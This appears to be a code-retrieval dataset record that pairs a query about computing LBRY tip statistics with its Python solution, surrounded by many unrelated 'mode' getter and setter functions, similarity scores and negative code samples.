self.write('SOUR1:LIST:MODE STEP') #Make Step mode in order to not automatically sweep all the frequencies\r\n self.write('SOURce1:FREQuency:MODE LIST')\r\n else:\r\n #CW and FIXed are synonyms for SMA100B\r\n self.write('SOURce1:FREQuency:MODE CW')", "def set_mode(self, mode='List'):\r\n \r\n #If we choose list mode \r\n if mode.lower() == 'list':\r\n #First choose a list if there was no, otherwise SMA100B is mad\r\n #To know the available list, the query is 'SOUR1:LIST:CAT?'\r\n self.write('SOUR1:LIST:SEL \"/var/user/list1.lsw\"') \r\n \r\n self.write('OUTP1:STAT ON') #Somehow the SMA100B wants the RF to be ON for switching into list mode.\r\n self.write('SOUR1:LIST:MODE STEP') #Make Step mode in order to not automatically sweep all the frequencies\r\n self.write('SOURce1:FREQuency:MODE LIST')\r\n else:\r\n #CW and FIXed are synonyms for SMA100B\r\n self.write('SOURce1:FREQuency:MODE CW')", "def __get_verify_mode(self):\n ...", "def _get_mode(self):\n raise NotImplementedError", "def _get_mode():\n return context.get_context('mode')", "def mode(self) -> str:\r\n ...", "def setMode(self, mode):\n if mode == 0 or mode == 1:\n with self.lock:\n self.mode = mode\n else:\n raise FliError(\"FLISetCameraMode failed\")", "def _mode_key(guild_id: int) -> str:\n return f\"mode/{guild_id}\"", "def handle_mode_received(\n msg: ReceiveMessage, template_name: str, attr: str, mode_list: str\n ) -> None:\n payload = self.render_template(msg, template_name)\n\n if payload not in self._config[mode_list]:\n _LOGGER.error(\"Invalid %s mode: %s\", mode_list, payload)\n else:\n setattr(self, attr, payload)\n get_mqtt_data(self.hass).state_write_requests.write_state_request(self)", "def _setmode(self, mode=None):\n if mode is None:\n return self._mode\n if mode not in [\"standard\", \"logo\", \"world\"]:\n return\n self._mode = mode\n if mode in [\"standard\", \"world\"]:\n self._angleOffset = 0\n self._angleOrient = 1\n else: # mode == \"logo\":\n self._angleOffset = self._fullcircle/4.\n self._angleOrient = -1", "def switch_mode(guild_id: int, mode: str):\n key = _mode_key(guild_id)\n db[key] = mode\n if mode == fixtures.chat:\n del db[key]", "def set_mode(self, mode: str) -> None:\n # Not all programs are fully supported by the current\n # OpenInterface API version. The known restricitons are:\n # - The 'Calibration' and 'TightnessTest' programms cannot\n # be started through the API.\n # - The 'Dry' program does not expose all it's parameters\n # (see github.com/buchi-labortechnik-ag/openinterface_rotavapor/issues/1)\n return self.send(self.cmd.SET_MODE, mode)", "def validate_mode(mode, operator_tag, is_sha_digest):\n version_supports_restricted = check_if_tag_supports_restricted(operator_tag, is_sha_digest)\n if mode == MODE_RESTRICTED and not version_supports_restricted:\n raise ValueError(\"{} is not supported for this version, please use {}\".format(MODE_RESTRICTED, MODE_ALL))", "def get_mode(self):\r\n s = self.query('FREQ:MODE?')\r\n if s == None: return None\r\n \r\n s = s.strip()\r\n if s == 'CW': return 'Fixed'\r\n elif s == 'LIST': return 'List'\r\n else:\r\n print('ERROR: Unknown mode '+str(s))\r\n return", "def get_mode(self):\r\n s = self.query('FREQ:MODE?')\r\n if s == None: return None\r\n \r\n s = s.strip()\r\n if s == 'CW': return 'Fixed'\r\n elif s == 'LIST': return 'List'\r\n else:\r\n print('ERROR: Unknown mode '+str(s))\r\n return", "def test_set_mode(self):\n context = Context(SSLv23_METHOD)\n assert MODE_RELEASE_BUFFERS & context.set_mode(MODE_RELEASE_BUFFERS)", "def competition_mode(self, on):\n pass", "def competition_mode(self, on):\n pass", "def set_mode(self, mode='List'):\r\n _debug('simq03b_api.set_mode')\r\n \r\n #If we choose list mode \r\n if mode.lower() == 'list':\r\n #First choose a list if there was no, otherwise SMA100B is mad\r\n #To know the available list, the query is 'SOUR1:LIST:CAT?'\r\n self.write('SOUR1:LIST:SEL \"/var/user/list1.lsw\"') \r\n \r\n self.write('OUTP1:STAT ON') #Somehow the SMA100B wants the RF to be ON for switching into list mode.\r\n self.write('SOUR1:LIST:MODE STEP') #Make Step mode in order to not automatically sweep all the frequencies\r\n self.write('SOURce:FREQuency:MODE LIST')\r\n else:\r\n #CW and FIXed are synonyms for SMA100B\r\n self.write('SOURce:FREQuency:MODE CW')", "def validate(self, mode): # pragma: no cover\n pass", "def manage_channels(_) -> int:\n return 1 << 4", "def manage_channels(_) -> int:\n return 1 << 4", "def set_mode(self, mode=0, detection_param=0):\r\n return self._arm.set_mode(mode=mode, detection_param=detection_param)", "def modes(self, modes):\n\n self._modes = modes", "def modes(self, modes):\n\n self._modes = modes", "def mode(self):\n return self._lift(\"mode\")", "def mode(self):\n return self._data.get('mode', None)", "def get_mode(self):\r\n s = self.query('FREQ:MODE?')\r\n if s == None: return None\r\n \r\n s = s.strip()\r\n if s == 'FIX': return 'Fixed'\r\n elif s == 'LIST': return 'List'\r\n else:\r\n print('ERROR: Unknown mode '+str(s))\r\n return", "def mode_remote(self):\n self.send(\"!MR\")\n # time.sleep(2.0)\n # No feedback, so query to verify set\n got = self.get_mode()\n assert got == \"R\", got", "def test_oneModeParameter(self):\n self._sendModeChange(\"+o\", \"a_user\")\n self._checkModeChange([(True, \"o\", (\"a_user\",))])\n self._sendModeChange(\"-o\", \"a_user\")\n self._checkModeChange([(False, \"o\", (\"a_user\",))])", "def main(ctx):\n\n print(\"Mode:\")", "def mode(self) -> Optional[str]:\n return pulumi.get(self, \"mode\")", "def mode(self) -> Optional[str]:\n return pulumi.get(self, \"mode\")", "def _checkMode(mode):\n\n if not isinstance(mode, str):\n raise TypeError('The {0} should be a string. Given: {1!r}'.format(\"mode\", mode))\n\n if mode not in [MODE_RTU, MODE_ASCII]:\n raise ValueError(\"Unreconized Modbus mode given. Must be 'rtu' or 'ascii' but {0!r} was given.\".format(mode))", "def test_mode_invalid(mode):\n # Test errors on construction\n with pytest.raises(TypeConversionError):\n gay_berne = md.pair.aniso.GayBerne(nlist=md.nlist.Cell(buffer=0.4),\n default_r_cut=2.5,\n mode=mode)\n gay_berne = md.pair.aniso.GayBerne(nlist=md.nlist.Cell(buffer=0.4),\n default_r_cut=2.5)\n gay_berne.params[('A', 'A')] = {'epsilon': 1, 'lpar': 0.5, 'lperp': 1.0}\n # Test errors on setting\n with pytest.raises(TypeConversionError):\n gay_berne.mode = mode", "def set_process_channel_mode(\n self, mode: ProcessChannelModeStr | core.QProcess.ProcessChannelMode\n ):\n self.setProcessChannelMode(PROCESS_CHANNEL_MODES.get_enum_value(mode))", "def test_getChannelModeParams(self):\n add, remove = map(sorted, self.client.getChannelModeParams())\n self.assertEqual(add, [\"b\", \"h\", \"k\", \"l\", \"o\", \"v\"])\n self.assertEqual(remove, [\"b\", \"h\", \"o\", \"v\"])\n\n def removeFeature(name):\n name = \"-\" + name\n msg = \"are available on this server\"\n self._serverTestImpl(\"005\", msg, \"isupport\", args=name, options=[name])\n self.assertIdentical(self.client.supported.getFeature(name), None)\n self.client.calls = []\n\n # Remove CHANMODES feature, causing getFeature('CHANMODES') to return\n # None.\n removeFeature(\"CHANMODES\")\n add, remove = map(sorted, self.client.getChannelModeParams())\n self.assertEqual(add, [\"h\", \"o\", \"v\"])\n self.assertEqual(remove, [\"h\", \"o\", \"v\"])\n\n # Remove PREFIX feature, causing getFeature('PREFIX') to return None.\n removeFeature(\"PREFIX\")\n add, remove = map(sorted, self.client.getChannelModeParams())\n self.assertEqual(add, [])\n self.assertEqual(remove, [])\n\n # Restore ISUPPORT features.\n self._sendISUPPORT()\n self.assertNotIdentical(self.client.supported.getFeature(\"PREFIX\"), None)", "def set_mode(msg_mode, who=None):\n global output_mode\n global LEVELS\n global loggers\n\n #Global mode\n if (output_mode == None):\n output_mode = \"WARN\"\n if (who == None):\n output_mode = msg_mode\n __create_logger(GENERIC_LOG_NAME, LEVELS[output_mode])\n\n #Individual mode\n if (who != None and who not in loggers):\n __create_logger(who, LEVELS[msg_mode])", "def test_modes_for_course_multiple(self):\r\n mode1 = Mode(u'honor', u'Honor Code Certificate', 0, '', 'usd', None)\r\n mode2 = Mode(u'verified', u'Verified Certificate', 0, '', 'usd', None)\r\n set_modes = [mode1, mode2]\r\n for mode in set_modes:\r\n self.create_mode(mode.slug, mode.name, mode.min_price, mode.suggested_prices)\r\n\r\n modes = CourseMode.modes_for_course(self.course_key)\r\n self.assertEqual(modes, set_modes)\r\n self.assertEqual(mode1, CourseMode.mode_for_course(self.course_key, u'honor'))\r\n self.assertEqual(mode2, CourseMode.mode_for_course(self.course_key, u'verified'))\r\n self.assertIsNone(CourseMode.mode_for_course(self.course_key, 'DNE'))", "def set_input_channel_mode(\n self, mode: InputChannelModeStr | core.QProcess.InputChannelMode\n ):\n self.setInputChannelMode(INPUT_CHANNEL_MODES.get_enum_value(mode))", "def setMode(self, newmode=None):\n if newmode==None and self.mode: return\n \n # find it in my dictionary\n for k,v in self.items():\n if k.lower() == \"mode\":\n if newmode:\n self.mode = newmode\n self[k] = str(self.mode)\n else:\n self.mode = int(v)\n \n # it wasn't in the dictionary\n if newmode and not self.mode:\n self.mode = newmode\n self[\"MODE\"] = str(self.mode)\n \n if not self.mode:\n raise NetworkException(\"Supplink mode not set: \" + str(self))", "def test_switch_channels(self):\n\t\t# not available yet, experimental\n\t\tpass", "def setMode(self, request, context):\n \n self.vehicle.mode = VehicleMode(str(request.mode))\n self.vehicle.wait_ready('mode')\n \n return droneconnect_pb2.Null()", "def get_mode(self):\r\n return self.mode", "def command(self, value):\n for ii in range(0, len(exposure_mode_names)):\n if value == exposure_mode_names[ii]: break\n self.tcp_comms.tcp_params.exposureMode = ii\n self.tcp_comms.send_exposure_mode(self.tcp_comms.tcp_params.exposureMode)", "def getModeString(self, mode):\n if mode == 0:\n return \"4 MHz\"\n elif mode == 1:\n return \"500 KHz\"\n else:\n raise FliError(\"FLIGetCameraModeString failed\")", "def get_mode(self, ):\n return self.get_parameter('mode')", "def set_mode(self, new_mode):\n\n\t\tself._log.info('Mode changed to: %s' % new_mode.name)\n\t\tself._mode = new_mode\n\t\tself._dump_configuration()\n\t\tself._remove_all_flow_records()", "def test_is_mode_upsellable(self, mode, is_upsellable):\n CourseModeFactory.create(mode_slug=mode, course_id=self.course.id)\n if mode == CourseMode.CREDIT_MODE:\n CourseModeFactory.create(mode_slug=CourseMode.VERIFIED, course_id=self.course.id)\n enrollment = CourseEnrollmentFactory(\n is_active=True,\n mode=mode,\n course_id=self.course.id,\n user=self.user\n )\n assert is_mode_upsellable(self.user, enrollment) is is_upsellable", "def command(self, value):\n global awb_mode_names\n for ii in range(0, len(awb_mode_names)):\n if value == awb_mode_names[ii]: break\n self.tcp_comms.send_awb_mode(ii)", "def bdev_ocf_set_cache_mode(client, name, mode):\n params = {\n 'name': name,\n 'mode': mode,\n }\n\n return client.call('bdev_ocf_set_cache_mode', params)", "def measurementMode(self, arg1, arg2):\n\t\tif (arg1 == \"SWE\" or arg1 == \"SAMP\" or arg1 == \"QSCV\") and (arg2 == \"SHOR\" or arg2 == \"LONG\" or arg2 == \"MED\"):\n\t\t\tself.write(\":PAGE:CHAN:MODE \" + arg1)\n\t\t\tself.write(\":PAGE:MEAS:MSET:ITIM \" + arg2)\n\t\telse:\n\t\t\tprint \"Invalid measurement mode or integration time. Exiting.\"\n\t\t\tsys.exit()\n\t\tpass", "def get_mode(self):\r\n _debug('simq03b_api.get_mode')\r\n \r\n s = self.query('FREQ:MODE?')\r\n if s == None: return None\r\n \r\n s = s.strip()\r\n if s == 'CW': return 'Fixed'\r\n elif s == 'LIST': return 'List'\r\n else:\r\n print('ERROR: Unknown mode '+str(s))\r\n return", "def setLastMicOnMode(self, channel, mode, unitCode=0):\n resp = self.XAPCommand('LMO', channel, mode, unitCode=unitCode)\n return str(resp)", "def test_tooFewModeParameters(self):\n self._sendModeChange(\"+o\")\n self._checkModeChange([])\n errors = self.flushLoggedErrors(irc.IRCBadModes)\n self.assertEqual(len(errors), 1)\n self.assertSubstring(\"Not enough parameters\", errors[0].getErrorMessage())", "def mode(self) -> str:\n return pulumi.get(self, \"mode\")", "def mode(self) -> str:\n return pulumi.get(self, \"mode\")", "def test_set_mode_wrong_args(self):\n context = Context(SSLv23_METHOD)\n with pytest.raises(TypeError):\n context.set_mode(None)", "def set_mode(self, mode_name, single_file_name=None):\n self.mode_name = mode_name\n\n if mode_name == 'training_model':\n # The mode that should be used when training or validing a model\n self.required_files = {'dose': ((1,) + self.patient_shape), # The shape of dose tensor\n 'ct': ((1,) + self.patient_shape), # The shape of ct tensor\n 'structure_masks': ((self.num_rois,) + self.patient_shape),\n # The shape of the structure mask tensor\n 'possible_dose_mask': ((1,) + self.patient_shape),\n # Mask of where dose can be deposited\n 'voxel_dimensions': (3,)\n # Physical dimensions (in mm) of voxels\n }\n elif mode_name == 'dose_prediction':\n # The mode that should be used when training or validing a model\n self.required_files = {'ct': ((1,) + self.patient_shape), # The shape of ct tensor\n 'structure_masks': ((self.num_rois,) + self.patient_shape),\n # The shape of the structure mask tensor\n 'possible_dose_mask': ((1,) + self.patient_shape),\n # Mask of where dose can be deposited\n 'voxel_dimensions': (3,) # Physical dimensions (in mm) of voxels\n }\n self.batch_size = 1\n print('Warning: Batch size has been changed to 1 for dose prediction mode')\n\n elif mode_name == 'predicted_dose':\n # This mode loads a single feature (e.g., dose, masks for all structures)\n self.required_files = {mode_name: ((1,) + self.patient_shape)} # The shape of a dose tensor\n\n elif mode_name == 'evaluation':\n # The mode that should be used evaluate the quality of predictions\n self.required_files = {'dose': ((1,) + self.patient_shape), # The shape of dose tensor\n 'structure_masks': ((self.num_rois,) + self.patient_shape),\n 'voxel_dimensions': (3,), # Physical dimensions (in mm) of voxels\n 'possible_dose_mask': ((1,) + self.patient_shape),\n }\n self.batch_size = 1\n print('Warning: Batch size has been changed to 1 for evaluation mode')\n\n else:\n print('Mode does not exist. Please re-run with either \\'training_model\\', \\'prediction\\', '\n '\\'predicted_dose\\', or \\'evaluation\\'')", "def set_autofeed_mode(self, mode):\n self._info(\"set_autofeed_mode\")\n self.parent.controller.set_autofeed_mode(mode)", "def register_mode(name, mode):\r\n if name in predefined_modes:\r\n raise ValueError('Mode name already taken: %s' % name)\r\n predefined_modes[name] = mode" ]
[ "0.60435784", "0.57577735", "0.55922663", "0.558323", "0.5573023", "0.554792", "0.55342835", "0.55269134", "0.55122584", "0.5491209", "0.5439935", "0.54331106", "0.5416338", "0.54091513", "0.5399344", "0.5399344", "0.5399344", "0.5391328", "0.53808737", "0.5337275", "0.53354955", "0.5328104", "0.5311297", "0.530364", "0.53007984", "0.52800363", "0.5273743", "0.52408254", "0.52401924", "0.522342", "0.51850295", "0.51683885", "0.51667887", "0.5165966", "0.5162725", "0.5161745", "0.51592237", "0.51561475", "0.5153731", "0.51503", "0.514999", "0.514999", "0.5144237", "0.5134591", "0.5133356", "0.51319003", "0.512197", "0.511353", "0.51107687", "0.51056856", "0.5094434", "0.50911057", "0.5056804", "0.50563836", "0.50563836", "0.5045686", "0.5041288", "0.5041288", "0.50346863", "0.50237304", "0.500687", "0.500687", "0.49931157", "0.4989987", "0.4989987", "0.49865615", "0.49797338", "0.49743864", "0.4967057", "0.49641076", "0.49503636", "0.49472153", "0.49472153", "0.49385637", "0.49385077", "0.49176043", "0.4914111", "0.49082533", "0.48988906", "0.48946843", "0.48925406", "0.48911852", "0.48882064", "0.48847458", "0.4878909", "0.4876399", "0.48673853", "0.48655593", "0.48624885", "0.48604652", "0.48589617", "0.4855421", "0.4844451", "0.48405126", "0.48353267", "0.4831732", "0.4831732", "0.481864", "0.48109645", "0.4806564", "0.48043504" ]
0.0
-1
Calculate tips over past X amount of time and write JSON output
def aggregate_tips(): # The SQL query to perform now = time.time() print("Computing tip stats...", end="", flush=True) labels = ["30_days", "7_days", "24_hours", "1_hour"] windows = [30*86400.0, 7*86400.0, 1*86400.0, 3600.0] result = {} result["unix_time"] = now result["human_time_utc"] = str(datetime.datetime.utcfromtimestamp(int(now))) + " UTC" # Agrees with old method, but should it be SUM(amount)? query = "SELECT support_id, amount, time, claim_name, claim_id, is_nsfw, SUM(to_claim_address) tot FROM (SELECT support.id as support_id, support.support_amount amount,\ transaction.transaction_time time, claim.is_nsfw is_nsfw,\ claim.claim_id claim_id, claim.name claim_name,\ (CASE WHEN (output.address_list LIKE CONCAT('%25', claim_address, '%25')) THEN '1' ELSE '0' END) to_claim_address\ FROM claim\ INNER JOIN support ON support.supported_claim_id = claim.claim_id\ INNER JOIN transaction ON support.transaction_hash_id = transaction.hash\ INNER JOIN output ON transaction.hash = output.transaction_hash \ WHERE transaction.transaction_time > ({now} - {window})\ AND transaction.transaction_time <= {now}) AS result\ GROUP BY support_id, amount;".format(now=now, window=windows[0]) request = requests.get("https://chainquery.lbry.com/api/sql?query=" + query) the_dict = request.json() # Get tips into numpy array times = [] tips = [] is_tip = [] links = [] is_nsfw = [] for row in the_dict["data"]: times.append(float(row["time"])) tips.append(float(row["amount"])) links.append("https://open.lbry.com/" + str(row["claim_name"]) + ":"\ + str(row["claim_id"])) is_nsfw.append(row["is_nsfw"]) if row["tot"] > 0: is_tip.append(True) else: is_tip.append(False) times = np.array(times) tips = np.array(tips) is_tip = np.array(is_tip) links = np.array(links) is_nsfw = np.array(is_nsfw) # Write tips for i in range(len(labels)): keep = (times > (now - windows[i])) & is_tip _times = times[keep] _tips = tips[keep] _links = links[keep] _is_nsfw = is_nsfw[keep] result["num_tips_{label}".format(label=labels[i])] = len(_tips) result["lbc_tipped_{label}".format(label=labels[i])] = float(_tips.sum()) maxtip = 0 maxtip_link = None maxtip_is_nsfw = None if len(_tips) > 0: maxtip = float(_tips.max()) index = np.argmax(_tips) maxtip_link = _links[index] maxtip_is_nsfw = _is_nsfw[index] result["biggest_tip_{label}".format(label=labels[i])] = maxtip result["biggest_tip_{label}_link".format(label=labels[i])] = maxtip_link result["biggest_tip_{label}_is_nsfw".format(label=labels[i])] = bool(maxtip_is_nsfw) # Write supports for i in range(len(labels)): keep = (times > (now - windows[i])) & (~is_tip) _times = times[keep] _tips = tips[keep] _links = links[keep] _is_nsfw = is_nsfw[keep] result["num_supports_{label}".format(label=labels[i])] = len(_tips) result["lbc_supports_{label}".format(label=labels[i])] = float(_tips.sum()) maxtip = 0 maxtip_link = None maxtip_is_nsfw = None if len(_tips) > 0: maxtip = float(_tips.max()) index = np.argmax(_tips) maxtip_link = _links[index] maxtip_is_nsfw = _is_nsfw[index] result["biggest_support_{label}".format(label=labels[i])] = maxtip result["biggest_support_{label}_link".format(label=labels[i])] = maxtip_link result["biggest_support_{label}_is_nsfw".format(label=labels[i])] = bool(maxtip_is_nsfw) f = open("tips_stats.json", "w") f.write(json.dumps(result)) f.close() print("done. ", flush=True, end="")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def calculate_tip(meal_base, tip_rate):", "def time_taken(json_cutlist, laser):\r\n\tcutlist = json.loads(json_cutlist)\r\n\ttime = 0\r\n\tcoordinate_array = [0, 0]\r\n\tfor a in cutlist:\r\n\t\tif a[0] == \"jump\" or a[0] == \"mark\":\r\n\t\t\tcoordinate_array = [float(a[1]) - coordinate_array[0], float(a[2]) - coordinate_array[1]]\r\n\t\t\tmag = math.sqrt(coordinate_array[0]**2 + coordinate_array[1]**2)\r\n\t\t\tif a[0] == \"jump\":\r\n\t\t\t\ttime += mag/laser[\"jump_speed\"]\r\n\t\t\telse:\r\n\t\t\t\ttime += mag/laser[\"mark_speed\"]\r\n\t\t\tcoordinate_array = [float(a[1]), float(a[2])]\r\n\t\telif a[0] == \"z_abs\" or a[0] == \"z_rel\":\r\n\t\t\tzSet = float(a[1])\r\n\t\telif a[0] == \"c_abs\" or a[0] == \"c_rel\":\r\n\t\t\tcSet = float(a[1])\r\n\t\telif a[0] == \"a_abs\" or a[0] == \"a_rel\":\r\n\t\t\taSet = float(a[1])\r\n\t\telse:\r\n\t\t\tpass\r\n\treturn str(datetime.timedelta(seconds=int(time)))", "def time_plot(time_window):\n try:\n time_window = int(time_window)\n\n # make a connection and look up DB\n conn = sqlite3.connect(\"tweets.db\")\n c = conn.cursor()\n\n t = datetime.utcnow() - timedelta(seconds=time_window)\n\n time_lst = list(c.execute(\"SELECT created_at from tweets;\"))\n time_lst = np.array([i[0] for i in time_lst])\n\n count = str(np.sum(time_lst>t.strftime('%Y-%m-%d %H:%M:%S')))\n\n json_response = {\"status\":\"success\", \"data\":count}\n conn.close()\n except:\n json_response = {\"status\":\"failure\"}\n traceback.print_exc()\n conn.close()\n\n return json.dumps(json_response)", "def main(url: str, time_window_list: list) -> dict:\n page = 1\n data = {\"JT1\": 0, \"JT2\": 0, \"JT3\": 0, \"JT4\": 0, \"JT5\": 0}\n\n print(f\"Mining on {url.split('/')[5]}\")\n while True:\n\n response = requests.get(f\"{url}?page={page}&state=closed&access_token=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\")\n\n if response.status_code in range(300, 500):\n print(f\"Error: {response.json()['message']}\")\n exit(1)\n\n if len(response.json()) == 0:\n break\n\n if response.status_code == 200:\n # print(f\"{response.json()=}\")\n # print(f\"{len(response.json())}\")\n for issue in response.json():\n\n # if issues is not a pull request\n if 'pull_request' not in issue:\n closed_at = datetime.strptime(issue['closed_at'].split(\"T\")[0], \"%Y-%m-%d\")\n\n # JT1\n if time_window_list[0]['since'] <= closed_at <= time_window_list[0]['to']:\n data['JT1'] = data['JT1'] + 1\n\n # JT2\n elif time_window_list[1]['since'] <= closed_at <= time_window_list[1]['to']:\n data['JT2'] = data['JT2'] + 1\n\n # JT3\n elif time_window_list[2]['since'] <= closed_at <= time_window_list[2]['to']:\n data['JT3'] = data['JT3'] + 1\n\n # JT4\n elif time_window_list[3]['since'] <= closed_at <= time_window_list[3]['to']:\n data['JT4'] = data['JT4'] + 1\n\n # JT5\n elif time_window_list[4]['since'] <= closed_at <= time_window_list[4]['to']:\n data['JT5'] = data['JT5'] + 1\n page += 1\n print(f\"Closed: {data=}\")\n print(f\"Done!\")\n return data", "def get_chartdata():\n callback = bottle.request.query.get('callback')\n y_axis = bottle.request.query.get('y_axis').strip()\n w_acts = [\"action='%s'\" % act for act in bottle.request.query.get('actions').strip().split(',')]\n w_acts = 'AND (%s)' % ' OR '.join(w_acts) if w_acts else ''\n f_value = 'AVG(latency)' if y_axis.startswith('avg') else 'COUNT(timestamp)'\n atomic = 1 if y_axis in ['aops', 'avgl'] else 0\n\n db_conn = tools.get_db_conn('%s.db' % bottle.request.query.test_run_id)\n sql = 'SELECT test_run_status, timestamp_started, timestamp_completed FROM info LIMIT 1'\n status, started, finished = tools.db_query(db_conn, sql)[1][0]\n progress = int(float(finished) - float(started)) if finished \\\n else int(tools.get_timestamp() - float(started))\n\n sql = 'SELECT substr(timestamp, 0, 11), code, %s FROM recs ' % f_value + \\\n 'WHERE atomic=%s %s GROUP BY code, substr(timestamp, 0, 11) ' % (atomic, w_acts) + \\\n 'ORDER BY id DESC LIMIT 3600' # last 1 hour activity\n\n result = tools.db_query(db_conn, sql)[1] if finished else tools.db_query(db_conn, sql)[1][:-1]\n result = list(reversed(result))\n results = {str(abs(int(item[0]) - int(float(started)))):\n {'failed': 0, 'passed': 0, 'incomplete': 0} for item in result}\n for item in result: # item[0] - timestamp, item[1] - code (None if incomplete), item[2] - value\n timestamp = str(int(item[0]) - int(float(started)))\n value = item[2] or 0\n results[timestamp]['failed'] += value if item[1] and item[1] != 200 else 0\n results[timestamp]['passed'] += value if item[1] == 200 else 0\n results[timestamp]['incomplete'] += value if item[1] == None else 0\n results = [{'timestamp': key, 'failed': value['failed'], 'passed': value['passed'],\n 'incomplete': value['incomplete']} for key, value in results.items()]\n result = {bottle.request.query.slave: results, 'status': status,\n 'started': started, 'finished': finished or '(not finished)', 'progress': progress}\n return '{0}({1})'.format(callback, result)", "def power_timeline():\n\n return [\n {\n \"timestamp\": \"2021-09-14T12:37:37.168817\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:37.669237\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:38.170142\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:38.670338\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:39.171321\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:39.671572\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:40.172503\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:40.672693\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:41.173552\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:41.673815\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:42.174560\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:42.674690\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:43.175441\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:43.675743\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:44.176551\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:44.677307\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:45.178049\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:45.678310\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:46.179120\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:46.679308\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:47.180223\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:47.680468\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:48.181316\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:48.681683\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:49.182522\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:49.682731\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:50.183680\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:50.683812\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:51.184792\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:51.685027\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:52.185709\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:52.686065\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:53.186929\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:53.687190\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:54.188031\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:54.688674\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:55.189489\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:55.690299\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:56.191124\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n\n ]", "def timed_recipes():\n time = request.args.get('time', 0, type=int) #raw input from HTML page\n global time_global\n time_global = time #sets global time to inputted time, for use in search function\n return jsonify(cooktime=time_global) #returns a confirmation of the input tiime", "def hourly_stats():\r\n count_total.delay()\r\n count_unique.delay()\r\n count_tags.delay()", "def genStats(data, printStats = 0):\n fVotes = 